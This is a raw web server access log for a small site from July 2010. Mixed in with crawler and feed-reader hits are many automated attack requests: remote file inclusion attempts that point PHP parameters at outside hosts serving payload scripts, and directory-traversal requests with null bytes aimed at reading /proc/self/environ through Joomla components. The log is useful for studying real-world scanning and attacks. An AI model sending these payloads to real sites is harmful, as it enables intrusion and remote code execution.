66.163.171.207 - - [25/Jul/2010:17:05:16 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.195 - - [25/Jul/2010:17:14:15 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
67.195.115.240 - - [25/Jul/2010:17:21:08 -0700] "GET /tmp/?S=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "redneckmba.com"
112.65.21.85 - - [25/Jul/2010:17:22:18 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/4.0 (Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)" "redneckmba.com"
93.158.149.32 - - [25/Jul/2010:17:31:44 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.redneckmba.com"
76.13.114.105 - - [25/Jul/2010:17:34:11 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
91.203.142.153 - - [25/Jul/2010:17:55:30 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.redneckmba.com"
91.203.142.153 - - [25/Jul/2010:17:55:31 -0700] "GET / HTTP/1.0" 200 763 "http://www.redneckmba.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.redneckmba.com"
67.195.115.240 - - [25/Jul/2010:18:01:38 -0700] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "redneckmba.com"
66.163.171.207 - - [25/Jul/2010:18:27:38 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
86.109.96.188 - - [25/Jul/2010:18:39:22 -0700] "GET /logs/access.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
86.109.96.188 - - [25/Jul/2010:18:39:22 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
86.109.96.188 - - [25/Jul/2010:18:39:22 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.106 - - [25/Jul/2010:18:41:11 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
86.109.96.188 - - [25/Jul/2010:18:47:46 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
112.104.57.22 - - [25/Jul/2010:18:48:05 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
112.104.57.22 - - [25/Jul/2010:18:48:05 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
112.104.57.22 - - [25/Jul/2010:18:48:05 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
112.104.57.22 - - [25/Jul/2010:18:50:40 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
112.104.57.22 - - [25/Jul/2010:18:50:42 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
112.104.57.22 - - [25/Jul/2010:18:50:43 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
112.104.57.22 - - [25/Jul/2010:18:58:58 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
112.104.57.22 - - [25/Jul/2010:18:58:59 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
112.104.57.22 - - [25/Jul/2010:18:59:00 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
112.104.57.22 - - [25/Jul/2010:18:59:05 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
112.104.57.22 - - [25/Jul/2010:18:59:06 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
112.104.57.22 - - [25/Jul/2010:18:59:06 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
112.104.57.22 - - [25/Jul/2010:18:59:11 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
112.104.57.22 - - [25/Jul/2010:18:59:12 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
112.104.57.22 - - [25/Jul/2010:18:59:12 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
76.13.123.195 - - [25/Jul/2010:19:08:53 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
173.234.16.90 - - [25/Jul/2010:19:13:25 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; DTS Agent" "www.redneckmba.com"
112.104.57.22 - - [25/Jul/2010:19:19:03 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
112.104.57.22 - - [25/Jul/2010:19:19:04 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
112.104.57.22 - - [25/Jul/2010:19:19:04 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
112.104.57.22 - - [25/Jul/2010:19:19:39 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
112.104.57.22 - - [25/Jul/2010:19:19:40 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
112.104.57.22 - - [25/Jul/2010:19:19:40 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
112.104.57.22 - - [25/Jul/2010:19:19:48 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
112.104.57.22 - - [25/Jul/2010:19:19:49 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
112.104.57.22 - - [25/Jul/2010:19:19:49 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
76.13.114.106 - - [25/Jul/2010:19:47:19 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.206 - - [25/Jul/2010:19:56:05 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
86.109.96.188 - - [25/Jul/2010:20:13:13 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
86.109.96.188 - - [25/Jul/2010:20:13:13 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
86.109.96.188 - - [25/Jul/2010:20:13:13 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
86.109.96.188 - - [25/Jul/2010:20:16:52 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
74.52.48.66 - - [25/Jul/2010:20:48:32 -0700] "GET /?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
74.52.48.66 - - [25/Jul/2010:20:48:32 -0700] "GET /logs//?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 2087 "-" "Mozilla/5.0" "www.redneckmba.com"
74.52.48.66 - - [25/Jul/2010:20:48:43 -0700] "GET /logs/access.log%20%20//?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
74.52.48.66 - - [25/Jul/2010:20:51:52 -0700] "GET /logs/access.log%20%20//?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
74.52.48.66 - - [25/Jul/2010:20:51:52 -0700] "GET /?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
74.52.48.66 - - [25/Jul/2010:20:51:52 -0700] "GET /logs//?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 2087 "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.106 - - [25/Jul/2010:20:53:42 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.194 - - [25/Jul/2010:21:06:31 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.206 - - [25/Jul/2010:21:11:39 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.106 - - [25/Jul/2010:21:24:55 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.206 - - [25/Jul/2010:21:45:33 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.107 - - [25/Jul/2010:21:48:31 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
86.109.96.188 - - [25/Jul/2010:21:53:55 -0700] "GET ///include/bbs.lib.inc.php?site_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
86.109.96.188 - - [25/Jul/2010:21:53:55 -0700] "GET /logs////include/bbs.lib.inc.php?site_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
86.109.96.188 - - [25/Jul/2010:21:53:55 -0700] "GET /logs/access.log////include/bbs.lib.inc.php?site_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.123.195 - - [25/Jul/2010:22:02:07 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
83.243.9.110 - - [25/Jul/2010:22:09:03 -0700] "GET /appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
83.243.9.110 - - [25/Jul/2010:22:09:04 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
83.243.9.110 - - [25/Jul/2010:22:09:07 -0700] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
83.243.9.110 - - [25/Jul/2010:22:09:18 -0700] "GET /appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
83.243.9.110 - - [25/Jul/2010:22:09:19 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
83.243.9.110 - - [25/Jul/2010:22:09:19 -0700] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.106 - - [25/Jul/2010:22:12:11 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.207 - - [25/Jul/2010:22:20:03 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.106 - - [25/Jul/2010:22:36:23 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
195.199.244.244 - - [25/Jul/2010:22:39:38 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.redneckmba.com"
195.199.244.244 - - [25/Jul/2010:22:53:29 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.redneckmba.com"
195.199.244.244 - - [25/Jul/2010:22:53:29 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.redneckmba.com"
195.199.244.244 - - [25/Jul/2010:22:53:30 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.redneckmba.com"
66.163.171.207 - - [25/Jul/2010:22:54:05 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
195.199.244.244 - - [25/Jul/2010:22:54:08 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.redneckmba.com"
195.199.244.244 - - [25/Jul/2010:22:54:09 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.redneckmba.com"
195.199.244.244 - - [25/Jul/2010:22:54:09 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.redneckmba.com"
76.13.123.195 - - [25/Jul/2010:22:56:39 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.107 - - [25/Jul/2010:23:00:00 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
120.50.34.74 - - [25/Jul/2010:23:20:08 -0700] "GET /logs/access.log/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
120.50.34.74 - - [25/Jul/2010:23:20:09 -0700] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.831" "www.redneckmba.com"
120.50.34.74 - - [25/Jul/2010:23:20:09 -0700] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2082 "-" "libwww-perl/5.831" "www.redneckmba.com"
120.50.34.74 - - [25/Jul/2010:23:20:59 -0700] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.831" "www.redneckmba.com"
120.50.34.74 - - [25/Jul/2010:23:21:18 -0700] "GET /logs/access.log/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
120.50.34.74 - - [25/Jul/2010:23:21:19 -0700] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.831" "www.redneckmba.com"
120.50.34.74 - - [25/Jul/2010:23:21:20 -0700] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2082 "-" "libwww-perl/5.831" "www.redneckmba.com"
120.50.34.74 - - [25/Jul/2010:23:22:23 -0700] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.831" "www.redneckmba.com"
76.13.114.105 - - [25/Jul/2010:23:23:40 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
120.50.34.74 - - [25/Jul/2010:23:24:08 -0700] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.831" "www.redneckmba.com"
120.50.34.74 - - [25/Jul/2010:23:29:01 -0700] "GET /logs/access.log/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
120.50.34.74 - - [25/Jul/2010:23:29:01 -0700] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.831" "www.redneckmba.com"
120.50.34.74 - - [25/Jul/2010:23:29:02 -0700] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2082 "-" "libwww-perl/5.831" "www.redneckmba.com"
66.163.171.205 - - [25/Jul/2010:23:29:08 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
67.205.67.73 - - [25/Jul/2010:23:31:49 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.205.67.73 - - [25/Jul/2010:23:31:49 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.205.67.73 - - [25/Jul/2010:23:31:49 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.205.67.73 - - [25/Jul/2010:23:31:56 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.205.67.73 - - [25/Jul/2010:23:31:56 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.205.67.73 - - [25/Jul/2010:23:31:56 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
88.250.57.232 - - [25/Jul/2010:23:35:51 -0700] "GET /logs/access_100725.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "www.redneckmba.com"
76.13.114.106 - - [25/Jul/2010:23:47:32 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.195 - - [25/Jul/2010:23:48:49 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
83.93.131.189 - - [25/Jul/2010:23:59:14 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
66.163.171.205 - - [26/Jul/2010:00:04:39 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.107 - - [26/Jul/2010:00:11:07 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
83.93.131.189 - - [26/Jul/2010:00:13:46 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
83.93.131.189 - - [26/Jul/2010:00:13:46 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
208.80.193.40 - - [26/Jul/2010:00:17:43 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows NT 5.1; {40398759-9D09-58DE-13D9-8255EC67C137}; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "www.redneckmba.com"
93.158.149.32 - - [26/Jul/2010:00:20:49 -0700] "GET /logs/scripts.log HTTP/1.1" 200 1456683 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.redneckmba.com"
83.93.131.189 - - [26/Jul/2010:00:23:05 -0700] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
83.93.131.189 - - [26/Jul/2010:00:23:06 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
83.93.131.189 - - [26/Jul/2010:00:23:06 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
175.180.251.109 - - [26/Jul/2010:00:24:06 -0700] "GET /logs/access_100712.log HTTP/1.1" 200 722261 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
76.13.114.107 - - [26/Jul/2010:00:34:53 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
118.168.96.196 - - [26/Jul/2010:00:36:40 -0700] "GET /logs/access_100614.log HTTP/1.1" 200 93466 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
120.50.34.74 - - [26/Jul/2010:00:39:33 -0700] "GET /logs/access_100614.log/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
66.163.171.205 - - [26/Jul/2010:00:41:18 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.195 - - [26/Jul/2010:00:45:10 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
203.73.222.141 - - [26/Jul/2010:00:50:40 -0700] "GET /logs/access_100614.log HTTP/1.1" 200 93466 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
76.13.114.106 - - [26/Jul/2010:00:59:29 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
62.182.63.46 - - [26/Jul/2010:01:01:02 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/ECB.php?mosConfig.absolute.path=http://server.cyber-town.ch/components/com_virtuemart/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.redneckmba.com"
62.182.63.46 - - [26/Jul/2010:01:01:02 -0700] "GET /components/com_fabrik/libs/Blowfish/ECB.php?mosConfig.absolute.path=http://server.cyber-town.ch/components/com_virtuemart/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.redneckmba.com"
212.117.164.64 - - [26/Jul/2010:01:10:28 -0700] "GET /logs/access_100531.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100531.log" "Mozilla/4.79 [en] (Windows NT 5.0; U)" "www.redneckmba.com"
212.117.164.64 - - [26/Jul/2010:01:10:17 -0700] "GET / HTTP/1.0" 200 763 "http://www.redneckmba.com/" "Mozilla/4.79 [en] (Windows NT 5.0; U)" "www.redneckmba.com"
